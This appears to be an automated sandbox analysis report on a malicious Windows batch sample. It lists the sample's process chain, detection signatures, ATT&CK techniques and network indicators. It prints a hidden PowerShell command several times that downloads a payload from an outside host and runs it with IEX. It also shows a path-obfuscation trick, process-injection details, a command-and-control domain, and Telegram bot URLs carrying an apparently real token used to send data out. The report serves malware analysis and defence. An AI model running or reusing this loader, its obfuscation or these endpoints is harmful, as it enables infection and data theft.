                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs"
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM jsc.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -executionpolicy bypass -command "[system.reflection.assembly]::loadwithpartialname('microsoft.visualbasic');$fj=[microsoft.visualbasic.interaction]::callbyname((new-object net.webclient),'downloadstring',[microsoft.visualbasic.calltype]::method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|iex;[byte[]]$f=[microsoft.visualbasic.interaction]::callbyname"

                      Language, Device and Operating System Detection

                      Source: Yara match | File source: Pe4905VGl1.bat, type: SAMPLE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      Source: Yara match | File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1012, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTR
                      Source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :Thu, 05 Oct 2023 08:05:20 GMTr\MsMpeng.exe
                      Source: powershell.exe, 00000004.00000002.2022032808.000002E7E2DF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2033951833.000002E7E3091000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information112
                      Scripting
                      Valid Accounts21
                      Windows Management Instrumentation
                      112
                      Scripting
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      OS Credential Dumping1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      211
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory14
                      System Information Discovery
                      Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Command and Scripting Interpreter
                      1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      111
                      Obfuscated Files or Information
                      Security Account Manager131
                      Security Software Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job
                      1
                      Registry Run Keys / Startup Folder
                      1
                      Registry Run Keys / Startup Folder
                      1
                      Install Root Certificate
                      NTDS1
                      Process Discovery
                      Distributed Component Object ModelInput Capture1
                      Non-Standard Port
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts41
                      PowerShell
                      Network Logon ScriptNetwork Logon Script2
                      Software Packing
                      LSA Secrets41
                      Virtualization/Sandbox Evasion
                      SSHKeylogging3
                      Non-Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input Capture114
                      Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading
                      DCSync1
                      System Network Configuration Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Modify Registry
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                      Virtualization/Sandbox Evasion
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
                      Process Injection
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph (ID: 1562421, Sample: Pe4905VGl1.bat, Start date: 25/11/2024, Architecture: WINDOWS, Score: 100)

Top-level network: api.telegram.org; ducksex.ddnsfree.com; 5 other IPs or domains
Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Powershell Download and Execute IEX; 12 other signatures; Uses the Telegram API (likely for C&C communication) (api.telegram.org)

Process tree:
- cmd.exe (started)
  Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Bypasses PowerShell execution policy; PowerShell case anomaly found
  - cmd.exe (started)
    Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); PowerShell case anomaly found
    - powershell.exe (started)
      Network: almamas.com.ly 168.119.208.219, 443, 49705 (HETZNER-ASDE, Germany); api.telegram.org 149.154.167.220, 443, 49710, 49711 (TELEGRAMRU, United Kingdom); ipinfo.io 34.117.59.81, 443, 49709 (GOOGLE-AS-APGoogleAsiaPacificPteLtdSG, United States)
      Dropped files: C:\Users\Public\AXAGFIIEZBBS.bat (ASCII); C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs (ASCII)
      Signatures: Creates an undocumented autostart registry key; Installs new ROOT certificates; Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module
      - wscript.exe (started)
        Signatures: Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
        - cmd.exe (started)
          Signatures: Wscript starts Powershell (via cmd or directly)
          - powershell.exe (started)
            Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes
            - aspnet_compiler.exe (started)
              Network: ducksex.ddnsfree.com 178.208.169.197, 49712, 49714, 49717 (PHMGMT-AS1US, Netherlands)
            - aspnet_compiler.exe (started)
          - conhost.exe (started)
      - taskkill.exe (started)
      - taskkill.exe (started)
      - 8 other processes
  - conhost.exe (started)

Source | Detection | Scanner | Label | Link
Pe4905VGl1.bat | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://localhost:3030/Service.asmx | 0% | Avira URL Cloud | safe |
https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg | 0% | Avira URL Cloud | safe |
https://ipinfo.i | 0% | Avira URL Cloud | safe |
ducksex.ddnsfree.com | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
ipinfo.io | 34.117.59.81 | true | false | | high
almamas.com.ly | 168.119.208.219 | true | true | | unknown
ducksex.ddnsfree.com | 178.208.169.197 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhoto | false | | high
https://api.telegram.org/bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessage | false | | high
ducksex.ddnsfree.com | true | Avira URL Cloud: safe | unknown
https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg | true | Avira URL Cloud: safe | unknown
https://ipinfo.io/json | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://localhost:3030/Service.asmx | powershell.exe, 00000013.00000002.1753014941.00000257032C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.00000257028C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1825667488.000002576EEE0000.00000004.08000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ipinfo.io/missingauth | powershell.exe, 00000004.00000002.1868900966.000002E7CC446000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CB0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | powershell.exe, 00000013.00000002.1823355430.000002576D0D4000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot$BotToken/sendPhoto | powershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000004.00000002.1868900966.000002E7CC773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ipinfo.io | powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmp | false | | high
